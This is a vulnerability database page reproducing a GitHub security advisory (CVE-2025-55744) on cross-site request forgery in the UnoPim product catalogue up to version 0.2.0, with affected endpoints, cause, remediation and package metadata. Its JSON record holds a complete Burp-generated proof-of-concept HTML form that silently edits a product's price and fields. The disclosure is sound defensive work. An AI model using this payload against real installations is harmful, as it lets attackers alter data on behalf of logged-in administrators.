ghsa-287x-6r2h-f9mw
Vulnerability from github
Published
2025-08-21 14:27
Modified
2025-08-21 19:16
Severity ?
6.9 (Medium) - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
Summary
UnoPim vulnerable to CSRF on Product edit feature and creation of other types
Details

Summary

Some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF). | Method | Endpoint | Status | Reason | |:------:|:------:|:------:|:------:| | POST | /admin/catalog/products/create | Not Vulnerable :white_check_mark: | X-XSRF-TOKEN header used | | GET | /admin/catalog/products/copy/{id}| Vulnerable :x: | Missing X-XSRF-TOKEN header or similar protection | | POST | /admin/catalog/products/edit/{id}| Vulnerable :x: | Missing X-XSRF-TOKEN header or similar protection | | POST | /admin/settings/users/create | Not Vulnerable :white_check_mark: | X-XSRF-TOKEN header used |

The below are some of the vulnerable endpoints that allow state changing actions including but not limited to: /admin/catalog/categories/create /admin/catalog/categories/edit/{id} /admin/catalog/category-fields/create /admin/catalog/category-fields/edit/{id} /admin/catalog/attributes/create /admin/catalog/attributes/edit/{id}

Details

CSRF attack happens when you visit an attacker controlled website which sends a cross origin request to vulnerable application in order to perform a state changing operation like edit the price of a product without the intention of victim. In this case, the POST request doesn't need any special headers ( X-XSRF-TOKEN header missing ) and the content-type is either application/x-www-form-urlencoded or multipart/form-data so we can say this is a Simple request ( doesn't need preflight request ). The cookies are send because samesite is set to None. We have every ingredients for a successful CSRF attack.

PoC

1. Go to any product and click on Edit.
2. Capture the request on Burp, right click and generate a CSRF POC  ( or use the below csrf-poc.html )
3. Access the poc.html and press submit request, the cross origin request will be send and we can see the price of the product has been changed.

POC Video link: https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ

csrf-poc.html: ```

history.pushState('', '', '/')

```

Impact

Attacker can perform action on behalf of the victim as this happens on the victim's browser provide the victim is already authenticated to the application. Attacker can use an image tag to send the GET request such that when the page is loaded, it'll get executed. As shown in the video POC, the product information can be tampered, create new categories etc.

Remediation:

  • Use CSRF token for every state changing request.
  • Use samesite: lax or strict, now it is set 'None'. Make sure all state changing requests are done using POST instead of GET. Noticed that for product copy feature, GET is used which means Samesite:strict needs to be set in that case. Otherwise Samesite: lax should suffice.
Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "unopim/unopim"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55744"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-21T14:27:18Z",
    "nvd_published_at": "2025-08-21T16:15:34Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nSome of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF).\n| Method | Endpoint | Status   | Reason |\n|:------:|:------:|:------:|:------:|\n| POST | /admin/catalog/products/create | Not Vulnerable :white_check_mark: | `X-XSRF-TOKEN` header used |\n| GET | /admin/catalog/products/copy/{id}| Vulnerable :x: | Missing `X-XSRF-TOKEN` header or similar protection |\n| POST | /admin/catalog/products/edit/{id}| Vulnerable :x: | Missing `X-XSRF-TOKEN` header or similar protection |\n| POST | /admin/settings/users/create | Not Vulnerable :white_check_mark: | `X-XSRF-TOKEN` header used |\n\nThe below are some of the vulnerable endpoints that allow state changing actions including but not limited to:\n```\n/admin/catalog/categories/create\n/admin/catalog/categories/edit/{id}\n/admin/catalog/category-fields/create\n/admin/catalog/category-fields/edit/{id}\n/admin/catalog/attributes/create\n/admin/catalog/attributes/edit/{id}\n```\n\n### Details\nCSRF attack happens when you visit an attacker controlled website which sends a cross origin request to vulnerable application in order to perform a state changing operation like edit the price of a product without the intention of victim.\nIn this case, the POST request doesn\u0027t need any special headers ( X-XSRF-TOKEN header missing ) and the content-type is either `application/x-www-form-urlencoded` or `multipart/form-data` so we can say this is a `Simple request` ( doesn\u0027t need preflight request ).  The cookies are send because `samesite` is set to `None`. We have every ingredients for a successful CSRF attack.\n\n### PoC\n    1. Go to any product and click on Edit.\n    2. Capture the request on Burp, right click and generate a CSRF POC  ( or use the below csrf-poc.html )\n    3. Access the poc.html and press submit request, the cross origin request will be send and we can see the price of the product has been changed.\n\nPOC Video link: https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ\n\n`csrf-poc.html`:\n```\n\u003chtml\u003e\n  \u003c!-- CSRF PoC - generated by Burp Suite Professional --\u003e\n  \u003cbody\u003e\n  \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n    \u003cform action=\"http://127.0.0.1:8000/admin/catalog/products/edit/7\" method=\"POST\" enctype=\"multipart/form-data\"\u003e\n      \u003cinput type=\"hidden\" name=\"\u0026#95;token\" value=\"s9Egihm0RD1Pd1NxhvTrx0a4qKCdl0UTSzyyJaK5\" /\u003e\n      \u003cinput type=\"hidden\" name=\"\u0026#95;method\" value=\"PUT\" /\u003e\n      \u003cinput type=\"hidden\" name=\"sku\" value=\"SM\u0026#45;BL\u0026#45;102\" /\u003e\n      \u003cinput type=\"hidden\" name=\"channel\" value=\"default\" /\u003e\n      \u003cinput type=\"hidden\" name=\"locale\" value=\"en\u0026#95;US\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;sku\u0026#93;\" value=\"SM\u0026#45;BL\u0026#45;102\" /\u003e\n      \u003cinput type=\"hidden\" name=\"uniqueFields\u0026#91;values\u0026#46;common\u0026#46;sku\u0026#93;\" value=\"values\u0026#91;common\u0026#93;\u0026#91;sku\u0026#93;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;product\u0026#95;number\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"uniqueFields\u0026#91;values\u0026#46;common\u0026#46;product\u0026#95;number\u0026#93;\" value=\"values\u0026#91;common\u0026#93;\u0026#91;product\u0026#95;number\u0026#93;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;name\u0026#93;\" value=\"test\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;url\u0026#95;key\u0026#93;\" value=\"fffkk\" /\u003e\n      \u003cinput type=\"hidden\" name=\"uniqueFields\u0026#91;values\u0026#46;common\u0026#46;url\u0026#95;key\u0026#93;\" value=\"values\u0026#91;common\u0026#93;\u0026#91;url\u0026#95;key\u0026#93;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;tax\u0026#95;category\u0026#95;id\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;tax\u0026#95;category\u0026#95;id\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;color\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;color\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;size\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;size\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;brand\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;brand\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;short\u0026#95;description\u0026#93;\" value=\"\u0026lt;p\u0026gt;fff\u0026lt;\u0026#47;p\u0026gt;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;description\u0026#93;\" value=\"\u0026lt;p\u0026gt;fff\u0026lt;\u0026#47;p\u0026gt;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;meta\u0026#95;title\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;meta\u0026#95;keywords\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;meta\u0026#95;description\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;price\u0026#93;\u0026#91;USD\u0026#93;\" value=\"7\u0026#46;777\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;cost\u0026#93;\u0026#91;USD\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;status\u0026#93;\" value=\"false\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;status\u0026#93;\" value=\"true\" /\u003e\n      \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n    \u003c/form\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n\n```\n\n### Impact\nAttacker can perform action on behalf of the victim as this happens on the victim\u0027s browser provide the victim is already authenticated to the application.\nAttacker can use an image tag to send the GET request such that when the page is loaded, it\u0027ll get executed.\nAs shown in the video POC, the product information can be tampered, create new categories etc.\n\n### Remediation:\n- Use CSRF token for every state changing request.\n- Use samesite: lax or strict, now it is set \u0027None\u0027. Make sure all state changing requests are done using POST instead of GET. Noticed that for product copy feature, GET is used which means Samesite:strict needs to be set in that case. Otherwise Samesite: lax should suffice.",
  "id": "GHSA-287x-6r2h-f9mw",
  "modified": "2025-08-21T19:16:50Z",
  "published": "2025-08-21T14:27:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/unopim/unopim/security/advisories/GHSA-287x-6r2h-f9mw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55744"
    },
    {
      "type": "WEB",
      "url": "https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/unopim/unopim"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "UnoPim vulnerable to CSRF on Product edit feature and creation of other types"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.